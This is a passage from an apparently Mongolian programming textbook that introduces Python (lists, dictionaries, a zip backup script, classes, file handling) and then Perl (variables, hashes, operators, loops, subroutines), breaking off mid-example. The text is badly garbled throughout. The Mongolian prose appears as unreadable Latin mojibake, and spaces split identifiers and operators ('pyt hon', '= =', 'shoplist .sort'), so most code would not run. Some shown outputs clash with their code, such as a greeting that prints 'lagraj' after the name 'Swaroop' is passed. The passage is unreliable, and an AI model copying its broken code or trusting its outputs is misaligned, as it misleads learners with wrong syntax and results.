# Filename: mymodule.py
def sayhi() :
print 'Hi, t his is mymodule speaking.'
version = '0.1'
# ! / usr/ bin/ pyt hon
108
# Filename: mymodule_demo.py
import mymodule
mymodule.sayhi()
print 'Version', mymodule.version
vp avu: $ pyt hon mymodule_demo.py
Hi, t his is mymodule speaking.
Version 0.1
- Ororpnaãa õv1su -
Pyt hon xanaua ererannüu sapnM :epnnür auxuaac us :oaopxoünx
eruaa. List , Tuple, Dict ionary rax Ma:.
Xarcaan: (list ) ôon sapnM nporpaMunanbu xanaua ôaüaar ererannüu
:epen. 3neMeu: uaMaxaaa mylist.append(elem) rax uaMua. 3ua us
xarcaan:bu :ercrena uaMaraaua. Xarcaan:br eep uar xarcaan:br apaac
us sanraxaaa mylist.extend(otherlist)-nür amnrnaua. Xvccau rasap:aa
aneMeu:aa uaMaxnüu :yna aapaaxbr amnrnaua mylist.insert(pos, elem).
Tyxaüu aneMeu:nür yc:raxaaa mylist.pop(n) vünannür amnrnaua. Faxaaa
aua uar svünnür auxaapax xapar:aü. Xoëpayraap aneMeu:nür yc:rax rax
ôaüraa ôon mylist.pop(1) rax opyynua. Yunp us aua aneMeu:nüu
ayraapnan: 0-aac axanaar. 3neMeu:nür aprvvnax, apaMôanaxaaa
mylist.reverse(), mylist.sort() dyukuvvanür amnrnaua.
# ! / usr/ bin/ pyt hon
# Filename: using_list .py
shoplist = [ 'apple', 'mango', 'carrot ', 'banana']
print 'I have', len(shoplist ), 'it ems t o purchase.'
print 'These it ems are: ',
for it em in shoplist :
print it em,
print '\ nI also have t o buy rice.'
shoplist .append('rice')
print 'My shopping list is now', shoplist
print 'I will sort my list now'
shoplist .sort ()
print 'Sort ed shopping list is', shoplist
print 'The first it em I will buy is', shoplist [ 0]
oldit em = shoplist [ 0]
del shoplist [ 0]
109
print 'I bought t he', oldit em
print 'My shopping list is now', shoplist
vp avu: $ pyt hon using_list .py
I have 4 it ems t o purchase.
These it ems are: apple mango carrot banana
I also have t o buy rice.
My shopping list is now [ 'apple', 'mango', 'carrot ', 'banana', 'rice']
I will sort my list now
Sort ed shopping list is [ 'apple', 'banana', 'carrot ', 'mango', 'rice']
The first it em I will buy is apple
I bought t he apple
My shopping list is now [ ' banana', 'carrot ', 'mango', 'rice' ]
Dict ionary ôon sr xvunü uap, xasr ônuaar aaa:ap mnr. Tvnxvvp:
:vvunü y:ra racau xapransaa:aü aneMeu:aa opyynua.
# ! / usr/ bin/ pyt hon
# Filename: using_dict .py
# 'ab' is short f or 'a'ddress'b'ook
ab = { 'Swaroop' : 'swaroopch@byt eofpyt hon.inf o',
'Larry' : 'larry@wall.org',
'Mat sumot o' : 'mat z@ruby-lang.org',
'Spammer' : 'spammer@hot mail.com'
}
print "Swaroop's address is %s" % ab[ 'Swaroop']
ab[ 'Guido'] = 'guido@pyt hon.org'
del ab[ 'Spammer']
print '\ nThere are %d cont act s in t he address-book\ n' % len(ab)
for name, address in ab.it ems():
print 'Cont act %s at %s' % (name, address)
if 'Guido' in ab: # OR ab.has_key('Guido')
print "\ nGuido's address is %s" % ab[ 'Guido']
vp avu: $ pyt hon using_dict .py
Swaroop's address is swaroopch@byt eofpyt hon.info
There are 4 cont act s in t he address-book
Cont act Swaroop at swaroopch@byt eofpyt hon.info
Cont act Mat sumot o at mat z@ruby-lang.org
Cont act Larry at larry@wall.org
Cont act Guido at guido@pyt hon.org
Guido's address is guido@pyt hon.org
110
3aan: ôon sr C xan aaap ôaüaar mnr, annaaa y:rbr xapransyynx
erue. Faxaaa :yxaüu y:rbr ôon aaaxrvü.
# ! / usr/ bin/ pyt hon
# Filename: reference.py
print 'Simple Assignment '
shoplist = [ 'apple', 'mango', 'carrot ', 'banana']
mylist = shoplist
del shoplist [ 0]
print 'shoplist is', shoplist
print 'mylist is', mylist
print 'Copy by making a full slice'
mylist = shoplist [ : ]
del mylist [ 0]
print 'shoplist is', shoplist
print 'mylist is', mylist
vp avu: $ pyt hon reference.py
Simple Assignment
shoplist is [ 'mango', 'carrot ' , 'banana']
mylist is [ 'mango', 'carrot ', 'banana']
Copy by making a full slice
shoplist is [ 'mango', 'carrot ' , 'banana']
mylist is [ 'carrot ', 'banana']
- Xamss nporpaM -
Oaoo uar xnmaa aau vsse. Taua sMap uar daünaa backup xnüx aaax
xapar rapaar ôaüx. Taraan :vvua unus sopnyncau xnmaa koa xap¡s.
Windows aaap xnüx ôaüraa ôon saMaa consx :aanapaü.
# ! / usr/ bin/ pyt hon
# Filename: backup_ver2.py
import os, t ime
source = [ '/ home/ swaroop/ byt e', '/ home/ swaroop/ bin']
# I f you are using Windows, use source = [ r'C: \ Document s',r'D: \ Work']
t arget _dir = '/ mnt / e/ backup/ '
t oday = t arget _dir + t ime.st rft ime('%Y%m%d')
now = t ime.st rft ime('%H%M%S')
comment = raw_input ('Ent er a comment --> ')
111
if len(comment ) = = 0:
t arget = t oday + os.sep + now + '.zip'
else:
t arget = t oday + os.sep + now + '_' + \
comment .replace(' ', '_') + '.zip'
if not os.pat h.exist s(t oday):
os.mkdir(t oday)
print 'Successfully creat ed direct ory', t oday
zip_command = "zip -qr '%s' %s" % (t arget , ' '.j oin(source) )
if os.syst em(zip_command) = = 0:
print 'Successful backup t o', t arget
else:
print 'Backup FAI LED'
vp avu: $ python backup_ver+.py
Ent er a comment --> added new examples
Successful backup t o
/ mnt / e/ backup/ 20041208/ 082156_added_new_examples.zip
$ pyt hon backup_ver4.py
Ent er a comment -->
Successful backup t o / mnt / e/ backup/ 20041208/ 082316.zip
- Oõ1ex1 xaapan1a1 nporpaMunan -
Hpoueayp xauaan:a: nporpaMunanaac oô¡ek: xauaan:a:
nporpaMunana onou aaayy :an ônü. ToM nporpaM ônunx ôaüraa vea
xsnôap ôaüxaac raaua nporpaMbu xaMxaa us ôara ôaüaar. Oô¡ek:
xauaan:a: nporpaMunanbu vuaac ôon Knacc ôa Oô¡ek: kM. Oô¡ek:bu
xnmaa nporpaM:
# ! / usr/ bin/ pyt hon
# Filename: met hod.py
class Person:
def sayHi(self):
print 'Hello, how are you?'
p = Person()
p.sayHi()
vp avu: $ python met hod.py
Hello, how are you?
112
__init __ Me:oabr amnrnacau xnmaa:
# ! / usr/ bin/ pyt hon
# Filename: class_init .py
class Person:
def __init __(self , name):
self.name = name
def sayHi(self):
print 'Hello, my name is', self.name
p = Person('Swaroop')
p.sayHi()
vp avu: $ pyt hon class_init .py
Hello, my name is lagraj
- YpaMman -
YaaMmnn raaar ôon oô¡ek: xauaan:a: :exuonornüu vea saünmrvü
spnraaar svün ônnaa. 3ua us onou knaccaa ôaüaar nxnn svüncnür aaxnu
aaxnu ônunxaac caprnüncau svün.
# ! / usr/ bin/ pyt hon
# Filename: inherit .py
class SchoolMember:
'''Represent s any school member.'''
def __init __(self , name, age):
self.name = name
self.age = age
print '(I nit ialized SchoolMember: %s)' % self.name
def t ell(self):
'''Tell my det ails.'''
print 'Name: "%s" Age: "%s"' % (self.name, self.age),
class Teacher(SchoolMember):
'''Represent s a t eacher.'''
def __init __(self , name, age, salary):
SchoolMember.__init __(self , name, age)
self.salary = salary
print '(I nit ialized Teacher: %s)' % self.name
def t ell(self):
SchoolMember.t ell( self)
113
print 'Salary: "%d"' % self.salary
class St udent (SchoolMember):
'''Represent s a st udent .'''
def __init __(self , name, age, marks):
SchoolMember.__init __(self , name, age)
self.marks = marks
print '(I nit ialized St udent : %s)' % self.name
def t ell(self):
SchoolMember.t ell(self)
print 'Marks: "%d"' % self .marks
t = Teacher('Mrs. Shrividya', 40, 30000)
s = St udent ('Swaroop', 22, 75)
print
members = [ t , s]
for member in members:
member.t ell()
vp avu: $ python inherit.py
(I nit ialized SchoolMember: Mrs. Shrividya)
(I nit ialized Teacher: Mrs. Shrividya)
(I nit ialized SchoolMember: Swaroop)
(I nit ialized St udent : Swaroop)
Name: "Mrs. Shrividya" Age: "40" Salary: "30000"
Name: "Swaroop" Age: "22" Marks: "75"
- Opon1 rapan1 -
1aüna ônunx, daünaac yumnx :yxaü aua vsse. “ w” ôon ônunxaap, ¨r"
yumnxaap xauaaua raarnür :oaopxoünx ôaüua.
# ! / usr/ bin/ pyt hon
# Filename: using_file.py
poem = '''\
Programming is f un
When t he work is done
if you wanna make your work also f un:
use Pyt hon!
'''
f = file('poem.t xt ', 'w')
f.writ e(poem)
114
f.close()
f = file('poem.t xt ')
while True:
line = f.readline()
if len(line) = = 0:
break
print line,
f.close()
vp avu: $ python using_file.py
Programming is f un
When t he work is done
if you wanna make your work also f un:
use Pyt hon!
115
- 6vnsr 5 -
Perl xan
“ Good securit y is dependent on People, Process, and Technology.”
116
117
- Perl xsnaaã 1yxaã -
Perl xannür aux Larry Wall Nasa-a axnnnax ôaüxaaa soxnoxaa. Perl
raaar us Practical Extraction and Report Language racau vrnüu :oaunon
ôereea, UN!X, NvS, vNS, NS/DOS, Nacintosh, OS/2, Amiga ôonou ôycaa
vünannüu cnc:eMvva aaap axnnnaaar. Perl 1 xyannôap us 198/ oub 12
capbu 18-ua rapcau ôaüua. 3uaxvv xan nx xaMxaaunü :ekc:nür
uaaaapnar yanpaaar dyuku:aü ôaüaar. Neu cnc:eM, ererannüu cau,
xaparnarunüu xoopoua Mam uaaaapnar soxnuox axnnnaaar. Perl xannür
cypaxaa C, Pascal, Basic sapar npoueayp xauaan:a: nporpaMunanbr
oünroaor ôaüxaa n ôonuo. Xyascaru, Maccna, aaa:an:, opon: rapan: us
perl xanunü vuacau oünron:.
Perl xanaap robot nporpaMbr xnüx ôonaor. Xnmaanôan xaün:bu
cnc:eMnüu aans (Google, Yahoo, Teoma rax Ma:). Perl xan aaap ônucau
nporpaM Common Gateway !nterface web application-:aü Mam caüu
xaM:apu axnnnaaar. Form-yyabr UN!X aaô cepaep aaap xerxvvnaxaa perl
xan aMapxau ôaüaar. Perl 5 aaap eMuex xyannôapaacaa uaMaracau svün
us oô¡ek: xauaan:a: mnux uauap kM. Oaooroop 5.8.1 xyannôap us
xaparnaraax ôaüua. Perl xanunü cyn :an raaan compile xnüxaaa yaaau,
xssraapnaraMan :ooub napaMe:p URL-a aaMxyynaar.
Perl aaap ônucau nporpaM .pl ôonou .plx epre:ren:aü xaaranaraaua.
HporpaMbu ayua :aünôap ônunxaaa `#'-nür amnrnaua.
- Ororpnaãa 1opon -
Perl xanaua xapsuauryü ueeu :ooub ererannüu :epen ôaüaar. 3xunüx
us scalar kM. Bvx :oo, :aMaar: Mep us aua :epena opuo. Bnunxaaa ypa us
aonnapbu :aMaar :aanua. ToM xnxnr vcrnür snraa:aü aau vsaar. Xnmaa
us: $Name, $name us snraa:aü xyascaruna kM. Perl xan xapar:aü veaaa
eepee :oo, :aMaar: Mepnür xoopoua aa:oMa:aap xyanpraua. Xnmaa us:
$a = 2;
$b = 6;
$c = $a . $b; # ¨." onepa:op us xoëp :aMaar: Mepnür xonôox
sopnynan::aü
$d = $c / 2;
print $d;
vp avu: 13
118
a, b xoëp xyascarunür xoopoua :aMaar: Mep ôaüanaap sanraaa
rapcau :aMaar: Mepee 2-: xyaaax ôaüua. 3ua :oor :aMaar: Mep nvv
aapaa us :aMaar: Mepee :oo pyy xyanprax ôaüua. Xnmaa nporpaM
xapaan:
# ! / usr/ local/ bin/ perl –w
# Show warnings
$who = ‘Jargal’;
$where = ‘Ulaanbaat ar’;
print “ My name is $who,\ n” ;
print “ I live in $where,\ n” ,
vp avu: My name is Jargal, I live in Ulaanbaat ar,
Perl xanaua :oo xapyynaxaaa :oM :oor :acnanaap ( , ) ônm aooryyp
sypaac ( _ ) xaparnax ônuaar. By:apxaü :oor uar :aasx xapyynua.
Xnmaanôan :acnan xaparnaaan:
# ! / usr/ bin/ perl
print 2,500,000;
vp avu: 25000
Xapnu aooryyp sypaac xaparnaaan:
# ! / usr/ bin/ perl
print 2_500_000;
vp avu: 2500000 rax rapua.
Heree ererannüu :epen us Naccna kM. Naccnabr :oaopxoünôon
onou scalar ererannüu uyrnyynrbr xanua. Bnunxaaa ypa us @
:aMaarnaraar :aanua. Xnmaa us:
@t rees = ( “ Larch” , “ Hazel” , “ Oak” ) ;
TaMaar: Mep :oor uar Maccnaa opyynaxaa acyyaan rapaxrvü. Xnmaa us:
@it ems = ( 15, 45.67, “ case” );
print “ Take $it ems[ 0] $it ems[ 2] s at \ $$it ems[ 1] each.\ n” ;
vp avu: Take 15 cases at $45.67 each.
Perl xanaua ôvx Maccna anuaMnk ôaüaar. HüMa cauax oü xyaaapnnax
:an aaap cauaa soaon:rvü kM. Naccna ao:op Maccna sapnax ôonuo.
Xnmaa us:
@A = ( 1, 2, 3) ;
@B = (4, 5, 6);
@C = (7, 8, 9) ;
@D = ( @A, @B, @C);
119
Har auxaapax svün ôon:
@A = ( 1, 2, 3, 4) ;
@B = @A;
$C = @A; aua @B us Maccnanüu aneMeu:vva ôonox 1-+ xvp:anx :oor
aryynua. Xapnu C us Maccnabu unü: aneMeu:nüu :oo ôyky +-r aryynua.
Perl xanunü onou dyuku Maccnabr apryMeu:aap aaaar. Xnmaa us sort
dyuku, aua dyuku Maccnabu aneMeu:vvanür aau apaMôanaaa ôyuaaaar.
Print sort ( ‘Bet a’, ‘Gamma’, ‘Alpha’ );
vp avu: AlphaBet aGamma
Oep uar dyuku ôon join kM. 3ua dyuku 2 apryMeu: aaua. TaMaar:
Mepvvanür aaaaa xoopoua xonôox uar :aMaar: Mep ôonrouo. Auxub
aneMeu: us xonôox sopnynan::aü.
Xnmaanôan:
print j oin ( ‘ : ‘, ‘Name’, ‘Address’, ‘Phone’ );
vp avu: Name : Address : Phone.
Sort dyuku:aü xaM: xaparnaaan:
print j oin( ‘, ‘, sort ( ‘Bet a’, ‘Gamma’, ‘Alpha’ ) );
vp avu: Alpha, Bet a, Gamma
Onou Maccnabr uar:raaan:
print j oin( ‘: ‘, (‘A’, ‘B’, ‘C’), (‘D’, ‘E’), (‘F’, ‘G’, ‘H’, ‘I ’));
vp avu: A: B: C: D: E: F: G: H: I
Oep uar :epen ôon associative Maccna (hash rax u uapnaaar) kM. 3ua
Maccna us :ypmnara:aü perl nporpaMuna xaparnaaar.
@fruit = ( “ Apple” , “ Orange” , “ Banana” );
print $fruit [ 2] ;
vp avu: Banana
3ua xnmaa ônaunü Maaax svün ôaüua. Xapaaa $fruit|/| raaan null y:ra
ôyuaaua.
%fruit = (“ Green” , “ Apple” , “ Orange” , “ Orange” , “ Yellow” , “ Banana” );
print $fruit { “ Yellow” } ;
va avu: Banana
3ua Green ôon Apple-u :vnxvvp kM. Yellow ôon Banana-u :vnxvvp
yupaac xaanaxaaa Yellow-r ônm Banana-r xaanax ôaüua. Oureu xapaan
$Total|5| us $Total{`June'}-c aMap xaparaax ôaüraa ôaüx. Yvunür
oünroxoa ererannüu caurnüu table-u :vnxvvp :yc ôonuo. Xnmaanôan:
120
%Folk = ( ‘YY’, ‘Yon Yonson’, ‘TC’, ‘Terra Cot t a’, ‘RE’, ‘Ron Everly’ );
%St at e = ( ‘YY’, ‘Wisconsin’, ‘TC’, ‘Minnesot a’, ‘RE’, ‘Bliss’ );
%Job = ( ‘YY’, ‘work in a police’, ‘TC’, ‘t each nuclear physics’, ‘RE’,
‘wat ch foot ball’);
foreach $person ( ‘TC’, ‘YY’, ‘RE’ ) {
print “ My name is $Folk{ $person} ,\ n” ,
“ I live in $St at e{ $person} ,\ n” ,
“ I $Job{ $person} t here.\ n\ n” ;
}
vp avu: My name is Terra Cot t a,
I live in Minnesot a,
I t each nuclear physics t here.
My name is Yon Yonson,
I live in Wisconsin,
I work in a police t here.
My name is Ron Everly,
I live in Bliss,
I wat ch foot ball t here.
- Onepa1opyyp -
Onepa:opyya us koMnsk:ep: sMap vünaan xnüxnür :oaopxoünx
eraer. Perl xanaua ôycaa xanuaac nnvv onou onepa:op ôaüaar. Bvx
onepa:opyya us onepauayya aaap ôonou aau rauu onepaua
rvüua:raraaua. Onepa:op ôa onepauabu koMônuaubr nnapxnünan rax
uapnaaar.
ApndMe:nk onepa:op - Na:eMa:nknüu vuacau vünanvva opuo.
Xnmaa:
# ! / usr/ bin/ perl
print "21 - 25 is: ", 25 - 21, "\ n";
print "4 + 13 - 7 is: ", 4 + 13 - 7, "\ n";
vp avu: 21 - 25 is: 4
4 + 13 - 7 is: 10
Bn: onepa:op - Annaaa y:rbu ôn:vvaaa eepunen: xnüaar. Xnmaa:
# ! / usr/ bin/ perl
print "51 ANDed wit h 85 gives us ", 51 & 85, "\ n";
vp avu: 51 ANDed wit h 85 gives us 17
121
Xapsuyynax onepa:op - TaMaar: Mepnür xoopoua us xapsuyynax,
:oouyyabr xoopoua us xapsuyynax onepa:op. Xnmaa:
# ! / usr/ bin/ perl
print "Which came first , t he chicken or t he egg? ";
print "chicken" cmp "egg", "\ n";
print "Are dogs great er t han cat s? ";
print "dog" gt "cat ", "\ n";
print "I s ^ less t han + ? ";
print "^ " lt "+ ", "\ n";
vp avu: Which came first , t he chicken or t he egg? -1
Are dogs great er t han cat s? 1
I s ^ less t han + ?
# ! / usr/ bin/ perl
print "5 > 6? ", 5 > 6, "\ n";
print "7 < 16? ", 7 < 16, " \ n";
print "2 = = 2? ", 2 = = 2, "\ n";
print "1 > 1? ", 1 > 1, " \ n";
print "6 ! = 7? ", 6 ! = 7, "\ n";
print "Compare 8 and 4? ", 8 < = > 4, " \ n";
print "Compare 7 and 7? ", 7 < = > 7, " \ n";
vp avu: 5 > 6?
7 < 16? 1
2 = = 2? 1
1 > 1?
6 ! = 7? 1
Compare 8 and 4? 1
Compare 7 and 7? 0
Pornk onepa:op - Perl xanaua ]] (or) 88 (and) onepa:opyya ôaüx ôa
aaraap us 2 onepaua aaaaa vuau acaan xyaan y:ra ôyuaaua. Ans uar vuau
ôaüxaa vuau y:raa aaax nornk onepa:opbr ]] raua.
$Weekend = $Sat urday | | $Sunday;
Sunday vuau ôon Weekend vuau ôonuo. 3caan Saturday vuau ôon
Weekend vuau ôonuo.
$value > 10 | | print “ Oops, low value $value …\ n” ;
Xapaaa value 10-aac nx ôon ôapyyu :anbu vünannür xnüxrvü. Xapaaa
10-aac ôara ôon print vünannür xnüua. Xnmaa us:
Oops, low value 6…
122
Bvra vuau ôaüxaa vuau y:raa aaaar nornk onepa:opbr ôa (88) raua.
$Solvent = ($income > 3) && ($debt s < 10);
income us 3-aac nx, debts us 10-aac ôara ôon Solvent us vuau ôonuo.
$value > 10 && print “ OK, value is high enough…\ n” ;
Xapaa value 10-aac ôara ôon ôapyyu :annüu vünannür manraxrvü.
3cpar :oxnonaona print vünannür xnüua.
TaMaar: Mep onepa:op ( St ring ) - TaMaar: Mep:aü axnnnax
onepa:op. Xnmaa:
# ! / usr/ bin/ perl
print "Ba". "na"x4* 3 ,"\ n";
print "Ba". "na"x(4* 3) ,"\ n";
vp avu: Ba0
Banananananananananananana
HaMaravvnax, xoporayynax onepa:op – 3ua ++X vünaan us X-r 1-aap
uaMaravvnua.
# ! / usr/ bin/ perl
$a= 4;
$b= 10;
print "Our variables are ", $a, " and ", $b, " \ n";
$b= $a+ + ;
print "Aft er increment ing, we have ", $a, " and ", $b, "\ n";
$b= + + $a* 2;
print "Now, we have ", $a, " and ", $b, " \ n";
$a= --$b+ 4;
print "Finally, we have ", $a, " and ", $b, " \ n";
vp avu: Our variables are 4 and 10
Aft er increment ing, we have 5 and 4
Now, we have 6 and 12
Finally, we have 15 and 11
Y:ra onrox onepa:op - X = 6 ôon X-a 6 racau y:ra onrox ôaüua.
Tacnan - Naccnabu aneMeu:vvanür xoopoua us :ycraapnaaar
onepa:op.
1aün manrax onepa:op - 1aün:aü xonôoo:oü vünanvvanür
rvüua:raua.
123
if(-e $filename) { …}
Tec: Y:ra
-e 1aün opmnu ôaüaan vuau y:ra:aü
-f 1aün :oaopxoü ôon vuau y:ra:aü
-d 1aün anpek:op ôon vuau
-z 1aünbu xaMxaa 0 ôon vuau
-s 1aünbu xaMxaar ôyuaaua
-r Yumnx apx erue
-w Bnunx apx erue
# ! / usr/ bin/ perl
print "Cont ent s of t he current direct ory: \ n";
opendir DH, "." or die "Couldn't open t he current direct ory: $! ";
while ($_ = readdir(DH)) {
next if $_ eq "." or $_ eq "..";
print $_, " " x (30-lengt h($_));
print "d" if -d $_;
print "r" if -r _;
print "w" if -w _;
print "x" if -x _;
print "o" if -o _;
print "\ t ";
print -s _ if -r _ and -f _;
print "\ n";
}
vp avu: Cont ent s of t he current direct ory:
badopen.plx rwo 111
chapt er6.t xt rwo 2860
copy.plx rwo 346
direct ory.plx rwo 514
filet est 1.plx rwo 1387
fort une.plx rwo 241
get t ysburg.t xt rwo 1459
glob.plx rwo 119
headline.plx rwo 521
invent ory.plx rwo 535
124
Xarcaan: - 3neMeu:vvanür xarcaan: xanôapaap soxnou ôaüryynaar
onepa:op.
Hexuen: onepa:op - Bycaa xanaua ôaüaar mnr uexuen: onepa:op.
Pornk onepa:opooc raaua vuau xyaan y:ra ôyuaaaar nnapxnünnvva
Onepa:op Y:ra
= = :auuvv
! = :auuvv ôyc
< = > :aMaar :auuvv ôyc
> nx
> = nx ôyky :auuvv
< ôara
< = ôara ôyky :auuvv
unless ôon nornk nnapxnünan vuau ôaüxaa ky u xnüxrvü.
Open (ERRLOG, “ t est .log” ) unless $NoLog;
print “ Success” unless $error> 2;
Yünanvvanüu aapaanan
Tvamnu Onepa:op Taünôap Bnenax aapaanan
22 (), [ ] , { } 1yuku ayyaax, Maccna 3vvuaac ôapyyu
21 > 3vvuaac ôapyyu
20 + + , -- HaMaravvnax xoporayynax
19 * * 3apar aaamvvnax Bapyyuaac svvu
18 ! , ~ , + , -,
\
Pornk vrvücran, yuap
vünaan
Bapyyuaac svvu
17 = ~ , ! ~ Xapsuyynax 3vvuaac ôapyyu
16 * , / , % x ApndMe:nk 3vvuaac ôapyyu
15 + , -, . HaMax, xacax, :aMaar: Mep
xonôox
3vvuaac ôapyyu
14 < < , > > Bn: mnnxvvnax 3vvuaac ôapyyu
13 1aün manrax
12 Xapsuyynax onepa:op
11 Tauuvvnax onepa:op
10 & Bn: `ôa' vünaan 3vvuaac ôapyyu
9 | , ^ Bn: `ôyky' `xor' vünaan 3vvuaac ôapyyu
125
8 && Pornk `ôa' 3vvuaac ôapyyu
7 | | Pornk `ôyky' 3vvuaac ôapyyu
6 .. Ypranxnvvnax onepa:op
5 ?: Hexuen: vünaan Bapyyuaac svvu
4 3aax Bapyyuaac svvu
3 , Tacnan 3vvuaac ôapyyu
2 not Pornk onepa:op 3vvuaac ôapyyu
1 and Pornk onepa:op 3vvuaac ôapyyu
0 or, xor Pornk onepa:op 3vvuaac ôapyyu
- Baa1an1 -
Perl xanaua while, unt il, for, foreach racau aaa:an:yya ôaüaar ôereea
ônunraax xanôap us epeuxnüaee nxnn ôaüaar. While, until aaa:an:yya us
C xanunü aaa:an::aü :ec:aü ôereea axnaaa uexuen ôaüaar kM.
# ! / usr/ bin/ perl
my $count down = 5;
while ($count down > 0) {
print "Count ing down: $count down\ n";
$count down--;
}
vp avu: Count ing down: 5
Count ing down: 4
Count ing down: 3
Count ing down: 2
Count ing down: 1
Last :vnxvvp vraap aaa:an:aac rapu ôonaor. Xnmaa us:
# ! / usr/ bin/ perl
my @array = ( "red", "blue", "STOP THI S NOW", "green");
for ( @array) {
last if $_ eq "STOP THI S NOW";
print "Today's colour is $_\ n";
}
vp avu: Today's colour is red
Today's colour is blue
Xapnu rapaxrvüraap aapaax vünaan pvv mnnxnxaa next :vnxvvp vr
:ycanua. Xnmaa:
126
# ! / usr/ bin/ perl
my @array = (8, 3, 0, 2, 12, 0) ;
for ( @array) {
if ($_ = = 0) {
print "Skipping zero element .\ n";
next ;
}
print "48 over $_ is ", 48/ $_, "\ n";
}
vp avu: 48 over 8 is 6
48 over 3 is 16
Skipping zero element .
48 over 2 is 24
48 over 12 is 4
Skipping zero element .
Foreach aaa:an: us apaü eep ôereea Maccnabu aneMeu:vva ôvp aaap
block ao:opx vünanaa xnüaar. Xnmaanôan:
@numbers = (“ one” , “ t wo” , “ t hree” , “ f our” );
foreach $num ( @numbers ) {
print “ Number $num…\ n” ;
}
vp avu: Number one…
Number t wo…
Number t hree…
Number four…
- Oaãnma opon1 rapan1 -
Perl xanunü opon: rapan: us C-:aü aannxau ôaüaar. 1aünbu
xaauaac yumnx, xaaua ônunx vünanaa :oxnpyynua. Yvua STDI N, STDOUT,
STDERR opuo. Anaaa rapcubr xapyyn¡s raaan:
print (STDERR “ Oops, somet hing broke.\ n” );
1aünaac yumnxaaa:
# ! / usr/ bin/ perl
open FI LE, "nlexample.t xt " or die $! ;
my $lineno = 1;
127
while (< FI LE> ) {
print $lineno+ + ;
print ": $_";
}
vp avu: 1: One day you're going t o have t o face
2: A deep dark t rut hf ul mirror,
3: And it 's gonna t ell you t hings t hat I st ill
4: Love you t oo much t o say.
5: # # # # # # # Elvis Cost ello, Spike, 1988 # # # # # # #
# ! / usr/ bin/ perl
my $source = $ARGV[ 0] ;
my $dest inat ion = $ARGV[ 1] ;
open I N, $source or die "Can't read source file $source: $! \ n";
open OUT, "> $dest inat ion" or die "Can't writ e on file $dest inat ion:
$! \ n";
print "Copying $source t o $dest inat ion\ n";
while (< I N> ) {
print OUT $_;
}
vp avu: Copying get t sburg.t xt t o speech.t xt
1aünaac yumaaa apaMôanaaa ônuaar nporpaMbu xnmaa:
# ! / usr/ bin/ perl
my $numeric = 0;
my $input = shift ;
if (defined $input and $input eq "-n") {
$numeric = 1;
$input = shift ;
}
my $out put = shift ;
if (defined $input ) {
open I NPUT, $input or die "Couldn't open file $input : $! \ n";
} else {
* I NPUT = * STDI N;
}
if (defined $out put ) {
open OUTPUT, "> $out put " or die "Couldn't open file $input : $! \ n";
} else {
128
* OUTPUT = * STDOUT;
}
my @file = < I NPUT> ;
if ($numeric) {
@file = sort { $a < = > $b } @file;
} else {
@file = sort @file;
}
print OUTPUT @file;
vp avu: And nail my feet up where my head should be
And you can all die laughing, because I 'd wear it proudly
I f t hey had a king of fools t hen I could wear t hat crown
Well, I finally f ound someone t o t urn me upside-down
1aün uaax default y:ra us seaxeu yumnx ôaüaar. Yvunür eepunexaee
aapaax :aMarvvanür xaparnaua.
TaMaar Y:ra
< yumnx ôyky default
> ônunx
> > unünvvnax
+ < yumnx ônunx xoëynaa
+ > yumnx ônunx xoëynaa
] (daünbu uapnüu eMue) daünbr xaamaa raprax
] (daünbu uapnüu xoüuo) daüna xaauaac opyynax
- Label s -
Baa:an:bu vea nporpaMbu yparmaa xoümoo vcpax saprnür label raua.
Fypaau :epnnüu label ôaüaar.
Next - aaa:an:bu vea aapaax vünaan pvv mnnxnua.
Last - sapan:aü aaa:an:aac rapax :oxnonaona xaparnaaar.
Redo - aaa:an:bu vea eMuex vünaana mnnxnua. Bapaax xnmaa
daünbu couaroü ayraap:aü ôvx ônunarnür xaanax ôaüua.
RECORD: while ( < I NFI LE> ) {
$even = ! $even;
next RECORD if $even;
print ;
129
}
- Subr out i nes -
Bnaunü Maaaaraap C xanaua ôaüaar y:ra ôyuaaaarrvü dyukunür Perl
xanaua subroutine raaar. Toauxouaoo ôon un subroutine-r :oaopxoünuo,
perl onepa:op dyukuaa :oaopxoünaor. Bo:ooa xyascarunür local() acaan
my xaMaax dyukuaap :oaopxoünx eraer. Subtoutine-nü ônunraax xanôap
us:
sub subrout ine-name {
st at ement s
}
# ! / usr/ bin/ perl –w
&egsub1;
sub egsub1 {
print “ This subrout ine simply print s t his line.\ n” ;
}
Subrout ine-r ayyaaxaaa uapnüu eMue 8 :aMaarnaraar :aasaar. 1yuku
y:ra ôyuaaxaaa:
# ! / usr/ bin/ perl
my ($hours, $minut es, $seconds) = secs2hms(3723);
print "3723 seconds is $hours hours, $minut es minut es and $seconds
seconds";
print "\ n";
sub secs2hms {
my ($h,$m) ;
my $seconds = shift ;
$h = int ( $seconds/ (60* 60)); $seconds %= 60* 60;
$m = int ($seconds/ 60) ; $seconds %= 60;
ret urn ($h,$m,$seconds);
}
vp avu: 3723 seconds is 1 hours, 2 minut es and 3 seconds
1yukuaa apryMeu: aaMxyynax xnmaa:
$x = 45;
$y = 3;
130
print “ The ($x+ 1) * ( $y+ 1) “ ;
$ret urnval = &egsub6($x,$y);
print “ is $ret urnval.\ n” ;
print “ Not e t hat \ $x now is $x, and \ $y now is $y.\ n” ;
sub egsub6 { # Access $x and $y by reference
ret urn ($_[ 0] + + * $_[ 0] + + ) ;
}
vp avu: The (45+ 1) * (3+ 1) is 2070.
Not e t hat $x now is 47, and $y now is 3.
Pekypc dyukunüu xnmaa:
for ($x= 1; $x< = 10; $x+ + ) {
print “ Fact orial $x is “ ,&fact orial( $x), “ \ n” ;
}
sub fact orial {
local($x) = @_;
if ($x = = 1) {
ret urn 1;
}
else {
ret urn ( $x* fact orial($x-1)) ;
}
}
vp avu: Fact orial 1 is 1
Fact orial 2 is 2
Fact orial 3 is 6
Fact orial 4 is 24
Fact orial 5 is 120
Fact orial 6 is 720
Fact orial 7 is 5040
Fact orial 8 is 40320
Fact orial 9 is 362880
Fact orial 10 is 3628800
Rintime scope ôon sMap uar ônok ao:op :vp syypbu y:ra onrox.
# ! / usr/ bin/ perl
my $x = 10;
$_ = "alpha";
{
131
my $x = 20;
local $_ = "bet a";
somesub();
}
somesub();
sub somesub {
print "\ $x is $x\ n";
print "\ $_ is $_\ n";
}
vp avu: $x is 10
$_ is bet a
$x is 10
$_ is alpha
- Pat t ern mat chi ng -
Natching ôyky :aMaar: Mepnür xapsuyynax. 3urnüu pattern-unü
xnmaa ôon vr kM.
# ! / usr/ bin/ perl
my $found = 0;
$_ = "Nobody want s t o hurt you... 'cept , I do hurt people somet imes,
Case.";
my $sought = "people";
foreach my $word (split ) {
if ($word eq $sought ) {
